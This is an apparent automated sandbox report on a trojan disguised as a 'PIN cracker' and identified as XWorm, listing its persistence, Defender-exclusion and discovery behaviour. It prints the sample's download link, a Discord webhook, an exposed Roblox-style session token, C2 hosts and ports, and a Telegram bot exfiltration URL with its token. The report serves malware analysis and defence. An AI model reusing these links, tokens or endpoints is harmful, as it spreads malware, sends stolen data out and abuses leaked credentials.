xworm | hxxps://cdn[.]discordapp[.]com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1[.]03[.]exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING[:]-DO-NOT-SHARE-THIS[.]--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items[.]|_24155F12674FEACDAC1D30F2347091310E52249306B388396C6B57E93652228D43B01704E6478FB2DEBD2A696151DD15FF730006E7999D5C40D4BA66ADD05A1AE7018602D8CF75BBCC592A75A0C0F2C563B07462E99E480376C76EDEC208C371099E70AC73AFABCEC10C8136E2D489B455B43698A95979F90724242CC9E9226FF15E459DEE1F9468857BC0EAD561F676BA34DA861F64690A50DB8DD483D66FD3E803E0C759045E86F63B635CF59D7F4A58A11F15A14BCDC20BE4452DD757ECFB68783BF1989536404F2042824B789E9D1070578F073BD70E216254F0CEFC6AB0E2BFA508A7651A9E3D44C96675531214B2DECC0A6EBFD5D9AC72C9FA3A45455BB2C3A9BD7676B4774D9A544CE0345D2451602703A886A8C8A078B88AE5EBF8FCB2E8D4EC00D2CF44856D2C38DC4D30F10A0284186A480AEC02E8580CB1032FC928BFBBB87D7C26E2C8C9F12B8B67F064940009F474AF30A07D051B18C142D93499631B3B84104C04788E76E9B41CE5C7EC7CC7097BD1C0F1E050690B3BC9A272F24A5D0FD92A3AAC7E9B4D260E28830A2F0AC3B27920805B5421657A316BF7EBDC21385A5BE24CD0A6D3788D8640272F2CB5DE7EB65FB22F89C75C0DB56A7C70ED08EED7F6DBEF03587A85969F1867EC2759C829A3F48CCE10037ECCD0C71A003D21BA30B092EAE3C284E9663A7FCDBBE9BB8E48754649582E496152778AEEE0AA1EFFF011BB24E50E9454D668A875824A930558E470617C9CE7720C2A662FBD2A4E9D6DA0B76A61EDC99583693D2A2841A0ADB02F7753EFAA80B9D0B0CE801657D4325CE887BAD3C52F934F6AB01041B268AC0FE086494E27503773252E70B4D53250767F32A19D14BED7B2772BAE165A399A709605004C4239C880DB8C3F24C09D294C1CB2EACB7E7C848729BB55B2D785D8D9238ACA5D3140DF9E6BEED05699AAA17F206A39FC38291531989B8DB3475A0DB4699D0360AE05F907B4B2A09E9C62EE4153B1F6C91534160148F35ADC99173E039ECEAE37414E39BC20044D67360929F3C353D411347F27588F8E650D21D45F601781AFEBC34DDA6FF6E36EE9217716908E232736E53822D1F7D55B2FC76A55A3 hxxps://discord[.]com/api/webhooks/1306635202000322631/RZjYBAzL9oWlwvRjseb5WY_8BrrbDlxtRJlS6qHFp3QITJ06B1OAzzG8mUBYR57i95cI

Analysis

max time kernel
177s
max time network
177s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-11-2024 15:01

Sharing

Behavioral task

behavioral1

Sample

https://cdn.discordapp.com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1.03.exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_24155F12674FEACDAC1D30F2347091310E52249306B388396C6B57E93652228D43B01704E6478FB2DEBD2A696151DD15FF730006E7999D5C40D4BA66ADD05A1AE7018602D8CF75BBCC592A75A0C0F2C563B07462E99E480376C76EDEC208C371099E70AC73AFABCEC10C8136E2D489B455B43698A95979F90724242CC9E9226FF15E459DEE1F9468857BC0EAD561F676BA34DA861F64690A50DB8DD483D66FD3E803E0C759045E86F63B635CF59D7F4A58A11F15A14BCDC20BE4452DD757ECFB68783BF1989536404F2042824B789E9D1070578F073BD70E216254F0CEFC6AB0E2BFA508A7651A9E3D44C96675531214B2DECC0A6EBFD5D9AC72C9FA3A45455BB2C3A9BD7676B4774D9A544CE0345D2451602703A886A8C8A078B88AE5EBF8FCB2E8D4EC00D2CF44856D2C38DC4D30F10A0284186A480AEC02E8580CB1032FC928BFBBB87D7C26E2C8C9F12B8B67F064940009F474AF30A07D051B18C142D93499631B3B84104C04788E76E9B41CE5C7EC7CC7097BD1C0F1E050690B3BC9A272F24A5D0FD92A3AAC7E9B4D260E28830A2F0AC3B27920805B5421657A316BF7EBDC21385A5BE24CD0A6D3788D8640272F2CB5DE7EB65FB22F89C75C0DB56A7C70ED08EED7F6DBEF03587A85969F1867EC2759C829A3F48CCE10037ECCD0C71A003D21BA30B092EAE3C284E9663A7FCDBBE9BB8E48754649582E496152778AEEE0AA1EFFF011BB24E50E9454D668A875824A930558E470617C9CE7720C2A662FBD2A4E9D6DA0B76A61EDC99583693D2A2841A0ADB02F7753EFAA80B9D0B0CE801657D4325CE887BAD3C52F934F6AB01041B268AC0FE086494E27503773252E70B4D53250767F32A19D14BED7B2772BAE165A399A709605004C4239C880DB8C3F24C09D294C1CB2EACB7E7C848729BB55B2D785D8D9238ACA5D3140DF9E6BEED05699AAA17F206A39FC38291531989B8DB3475A0DB4699D0360AE05F907B4B2A09E9C62EE4153B1F6C91534160148F35ADC99173E039ECEAE37414E39BC20044D67360929F3C353D411347F27588F8E650D21D45F601781AFEBC34DDA6FF6E36EE9217716908E232736E53822D1F7D55B2FC76A55A3 https://discord.com/api/webhooks/1306635202000322631/RZjYBAzL9oWlwvRjseb5WY_8BrrbDlxtRJlS6qHFp3QITJ06B1OAzzG8mUBYR57i95cI

Resource

win10v2004-20241007-en

windows10-2004-x64

25 signatures

300 seconds

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1.03.exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_24155F12674FEACDAC1D30F2347091310E52249306B388396C6B57E93652228D43B01704E6478FB2DEBD2A696151DD15FF730006E7999D5C40D4BA66ADD05A1AE7018602D8CF75BBCC592A75A0C0F2C563B07462E99E480376C76EDEC208C371099E70AC73AFABCEC10C8136E2D489B455B43698A95979F90724242CC9E9226FF15E459DEE1F9468857BC0EAD561F676BA34DA861F64690A50DB8DD483D66FD3E803E0C759045E86F63B635CF59D7F4A58A11F15A14BCDC20BE4452DD757ECFB68783BF1989536404F2042824B789E9D1070578F073BD70E216254F0CEFC6AB0E2BFA508A7651A9E3D44C96675531214B2DECC0A6EBFD5D9AC72C9FA3A45455BB2C3A9BD7676B4774D9A544CE0345D2451602703A886A8C8A078B88AE5EBF8FCB2E8D4EC00D2CF44856D2C38DC4D30F10A0284186A480AEC02E8580CB1032FC928BFBBB87D7C26E2C8C9F12B8B67F064940009F474AF30A07D051B18C142D93499631B3B84104C04788E76E9B41CE5C7EC7CC7097BD1C0F1E050690B3BC9A272F24A5D0FD92A3AAC7E9B4D260E28830A2F0AC3B27920805B5421657A316BF7EBDC21385A5BE24CD0A6D3788D8640272F2CB5DE7EB65FB22F89C75C0DB56A7C70ED08EED7F6DBEF03587A85969F1867EC2759C829A3F48CCE10037ECCD0C71A003D21BA30B092EAE3C284E9663A7FCDBBE9BB8E48754649582E496152778AEEE0AA1EFFF011BB24E50E9454D668A875824A930558E470617C9CE7720C2A662FBD2A4E9D6DA0B76A61EDC99583693D2A2841A0ADB02F7753EFAA80B9D0B0CE801657D4325CE887BAD3C52F934F6AB01041B268AC0FE086494E27503773252E70B4D53250767F32A19D14BED7B2772BAE165A399A709605004C4239C880DB8C3F24C09D294C1CB2EACB7E7C848729BB55B2D785D8D9238ACA5D3140DF9E6BEED05699AAA17F206A39FC38291531989B8DB3475A0DB4699D0360AE05F907B4B2A09E9C62EE4153B1F6C91534160148F35ADC99173E039ECEAE37414E39BC20044D67360929F3C353D411347F27588F8E650D21D45F601781AFEBC34DDA6FF6E36EE9217716908E232736E53822D1F7D55B2FC76A55A3 https://discord.com/api/webhooks/1306635202000322631/RZjYBAzL9oWlwvRjseb5WY_8BrrbDlxtRJlS6qHFp3QITJ06B1OAzzG8mUBYR57i95cI

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

dec-mg.gl.at.ply.gg:58334

147.185.221.23:58334

changes-tiny.gl.at.ply.gg:57342

147.185.221.23:57342

person-bedford.gl.at.ply.gg:27900

147.185.221.23:27900

Attributes

Install_directory
%Userprofile%
install_file
USB.exe
telegram
https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070

Signatures

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral1/files/0x0003000000000711-132.dat	family_xworm
behavioral1/memory/3952-143-0x0000000000E70000-0x0000000000E92000-memory.dmp	family_xworm
behavioral1/files/0x0003000000000731-149.dat	family_xworm
behavioral1/files/0x0003000000000739-160.dat	family_xworm
behavioral1/memory/2020-166-0x0000000000120000-0x000000000013E000-memory.dmp	family_xworm
behavioral1/memory/4376-169-0x0000000000230000-0x000000000024E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3268	powershell.exe
440	powershell.exe
3680	powershell.exe
3536	powershell.exe
4680	powershell.exe
2476	powershell.exe
4948	powershell.exe
3636	powershell.exe
1664	powershell.exe
4444	powershell.exe
3960	powershell.exe
4228	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	XneoPinCrackerV1.03.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	XneoPinCrackerV1.02.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	aaaaaaa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	AAAAAAAAAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	ADSDADW.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	AAAAAAAAAA.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	aaaaaaa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	AAAAAAAAAA.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	ADSDADW.exe

Executes dropped EXE 7 IoCs

pid	Process
3792	XneoPinCrackerV1.03.exe
4876	XneoPinCrackerV1.02.exe
3952	aaaaaaa.exe
2020	ADSDADW.exe
4376	AAAAAAAAAA.exe
1820	system user
4524	system user

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	ADSDADW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	aaaaaaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	AAAAAAAAAA.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760701280208113"	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
392	schtasks.exe
1360	schtasks.exe
4064	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
3952	aaaaaaa.exe
4376	AAAAAAAAAA.exe
2020	ADSDADW.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
816	chrome.exe
816	chrome.exe
3960	powershell.exe
3960	powershell.exe
3680	powershell.exe
3680	powershell.exe
3960	powershell.exe
3536	powershell.exe
3536	powershell.exe
3680	powershell.exe
3536	powershell.exe
3268	powershell.exe
3268	powershell.exe
3268	powershell.exe
4680	powershell.exe
4680	powershell.exe
4680	powershell.exe
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe
440	powershell.exe
440	powershell.exe
4948	powershell.exe
4948	powershell.exe
4948	powershell.exe
440	powershell.exe
3636	powershell.exe
3636	powershell.exe
3636	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4376	AAAAAAAAAA.exe
4376	AAAAAAAAAA.exe
3952	aaaaaaa.exe
3952	aaaaaaa.exe
2020	ADSDADW.exe
2020	ADSDADW.exe
2020	ADSDADW.exe
2020	ADSDADW.exe
2020	ADSDADW.exe
2020	ADSDADW.exe
3952	aaaaaaa.exe
3952	aaaaaaa.exe
3952	aaaaaaa.exe
3952	aaaaaaa.exe
4376	AAAAAAAAAA.exe
4376	AAAAAAAAAA.exe
4376	AAAAAAAAAA.exe
4376	AAAAAAAAAA.exe
2020	ADSDADW.exe
2020	ADSDADW.exe
3952	aaaaaaa.exe
3952	aaaaaaa.exe
4376	AAAAAAAAAA.exe
4376	AAAAAAAAAA.exe
2020	ADSDADW.exe
2020	ADSDADW.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
816	chrome.exe
816	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe
Token: SeShutdownPrivilege	816	chrome.exe
Token: SeCreatePagefilePrivilege	816	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe
816	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4376	AAAAAAAAAA.exe
3952	aaaaaaa.exe
2020	ADSDADW.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 816 wrote to memory of 852	816	chrome.exe	83
PID 816 wrote to memory of 852	816	chrome.exe	83
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 668	816	chrome.exe	84
PID 816 wrote to memory of 844	816	chrome.exe	85
PID 816 wrote to memory of 844	816	chrome.exe	85
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86
PID 816 wrote to memory of 1660	816	chrome.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1.03.exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_24155F12674FEACDAC1D30F2347091310E52249306B388396C6B57E93652228D43B01704E6478FB2DEBD2A696151DD15FF730006E7999D5C40D4BA66ADD05A1AE7018602D8CF75BBCC592A75A0C0F2C563B07462E99E480376C76EDEC208C371099E70AC73AFABCEC10C8136E2D489B455B43698A95979F90724242CC9E9226FF15E459DEE1F9468857BC0EAD561F676BA34DA861F64690A50DB8DD483D66FD3E803E0C759045E86F63B635CF59D7F4A58A11F15A14BCDC20BE4452DD757ECFB68783BF1989536404F2042824B789E9D1070578F073BD70E216254F0CEFC6AB0E2BFA508A7651A9E3D44C96675531214B2DECC0A6EBFD5D9AC72C9FA3A45455BB2C3A9BD7676B4774D9A544CE0345D2451602703A886A8C8A078B88AE5EBF8FCB2E8D4EC00D2CF44856D2C38DC4D30F10A0284186A480AEC02E8580CB1032FC928BFBBB87D7C26E2C8C9F12B8B67F064940009F474AF30A07D051B18C142D93499631B3B84104C04788E76E9B41CE5C7EC7CC7097BD1C0F1E050690B3BC9A272F24A5D0FD92A3AAC7E9B4D260E28830A2F0AC3B27920805B5421657A316BF7EBDC21385A5BE24CD0A6D3788D8640272F2CB5DE7EB65FB22F89C75C0DB56A7C70ED08EED7F6DBEF03587A85969F1867EC2759C829A3F48CCE10037ECCD0C71A003D21BA30B092EAE3C284E9663A7FCDBBE9BB8E48754649582E496152778AEEE0AA1EFFF011BB24E50E9454D668A875824A930558E470617C9CE7720C2A662FBD2A4E9D6DA0B76A61EDC99583693D2A2841A0ADB02F7753EFAA80B9D0B0CE801657D4325CE887BAD3C52F934F6AB01041B268AC0FE086494E27503773252E70B4D53250767F32A19D14BED7B2772BAE165A399A709605004C4239C880DB8C3F24C09D294C1CB2EACB7E7C848729BB55B2D785D8D9238ACA5D3140DF9E6BEED05699AAA17F206A39FC38291531989B8DB3475A0DB4699D0360AE05F907B4B2A09E9C62EE4153B1F6C91534160148F35ADC99173E039ECEAE37414E39BC20044D67360929F3C353D411347F27588F8E650D21D45F601781AFEBC34DDA6FF6E36EE9217716908E232736E53822D1F7D55B2FC76A55A3 https://discord.com/api/webhooks/1306635202000322631/RZjYBAzL9oWlwvRjseb5WY_8BrrbDlxtRJlS6qHFp3QITJ06B1OAzzG8mUBYR57i95cI
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf7a0cc40,0x7ffbf7a0cc4c,0x7ffbf7a0cc58
  2⤵
  PID:852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1992,i,6273091851355394034,16608740173355162511,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1988 /prefetch:2
  2⤵
  PID:668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,6273091851355394034,16608740173355162511,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,6273091851355394034,16608740173355162511,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8
  2⤵
  PID:1660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,6273091851355394034,16608740173355162511,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,6273091851355394034,16608740173355162511,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
